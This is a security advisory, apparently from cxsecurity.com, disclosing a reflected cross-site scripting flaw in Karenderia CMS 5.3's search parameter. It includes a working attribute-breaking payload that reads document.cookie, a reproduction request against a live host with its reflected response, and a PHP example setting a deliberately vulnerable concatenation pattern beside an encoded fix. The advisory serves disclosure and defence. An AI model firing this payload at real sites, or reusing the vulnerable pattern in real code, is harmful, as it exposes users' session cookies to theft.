Karenderia CMS 5.3 Cross Site Scripting

2019.07.09
Credit: Sisyshell
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Karenderia CMS 5.3 - Reflected Cross site scripting
# Dork: N/A
# Date: 09-07-2019
# Exploit Author: Sisyshell
# Vendor Homepage: buyer2@codemywebapps.com
# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Windows
# CVE: N/A

Description
---------------
Reflected XSS via 's' param at /searcharea?s=" onmouseover="console.log(document.cookie);"

Payload: " onmouseover="console.log(document.cookie);"
Browser: Firefox 67
Date Observed: 9 July 2019

Reproduction GET
----------------
GET http://bastisapp.com/kmrs/searcharea?s="+onmouseout="alert(1);" HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Connection: keep-alive
Cookie: PHPSESSID=94kt2rgji1ir1fd1lnlha4m0q0; YII_CSRF_TOKEN=a2a652784b4e1f917ad08aba59a875be88c97873; kr_search_address=%22+onmouseout%3D%22alert%281%29%3B%22; client_location=%7B%22lat%22%3A0%2C%22long%22%3A0%7D
DNT: 1
Host: [domain].com
Pragma: no-cache
Referer: http://[domain].com/kmrs/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0

Reproduction Response
---------------------
<div class="col-md-6 col-xs-6 border">
  <a href="/kmrs/searcharea?s=" onmouseover="console.log(document.cookie);" &display_type="listview&quot;" class="display-type orange-button block center rounded " data-type="listview">
    <i class="fa fa-th-list"></i>
  </a>
  <a href="/kmrs/searcharea?s=" onmouseover="console.log(document.cookie);" &display_type="gridview&quot;" class="display-type orange-button block center rounded mr10px inactive" data-type="gridview">
    <i class="fa fa-th-large"></i>
  </a>
  <a href="javascript:;" id="mobile-filter-handle" class="orange-button block center rounded mr10px">
    <i class="fa fa-filter"></i>
  </a>
  <a href="javascript:;" id="mobile-viewmap-handle" class="orange-button block center rounded mr10px">
    <i class="ion-ios-location"></i>
  </a>
  <div class="clear"></div>
</div>
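
The response above shows the 's' value landing unencoded inside a double-quoted href attribute, where a '"' ends the attribute and the rest is parsed as new attributes. The following PHP is an added example, not Karenderia's code: it places that concatenation pattern beside a version that URL-encodes the query and then HTML-encodes the attribute value. The function names and the reduced markup are assumptions made for illustration.

```php
<?php
// Added example, not Karenderia source. All function names are hypothetical.

// Vulnerable pattern: the raw 's' value is concatenated into a
// double-quoted href, so a '"' inside it closes the attribute early.
function display_link_vulnerable(string $s, string $type): string
{
    return '<a href="/kmrs/searcharea?s=' . $s . '&display_type=' . $type
         . '" class="display-type" data-type="' . $type . '">';
}

// HTML-encode a value for use inside a quoted attribute.
function attr(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: allow-list the view type, percent-encode the query
// string, then HTML-encode the finished URL for the attribute context.
function display_link_safe(string $s, string $type): string
{
    if (!in_array($type, ['listview', 'gridview'], true)) {
        $type = 'listview';
    }
    $url = '/kmrs/searcharea?' . http_build_query(
        ['s' => $s, 'display_type' => $type],
        '',
        '&',
        PHP_QUERY_RFC3986
    );
    return '<a href="' . attr($url) . '" class="display-type" data-type="'
         . attr($type) . '">';
}

// Payload string taken from the advisory text.
$payload = '" onmouseover="console.log(document.cookie);"';

echo display_link_vulnerable($payload, 'listview'), "\n";
echo display_link_safe($payload, 'listview'), "\n";
```

In the hardened output the quote characters arrive as %22 inside the query string, so the href attribute is never closed and no onmouseover attribute is created.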



Copyright 2019, cxsecurity.com

 
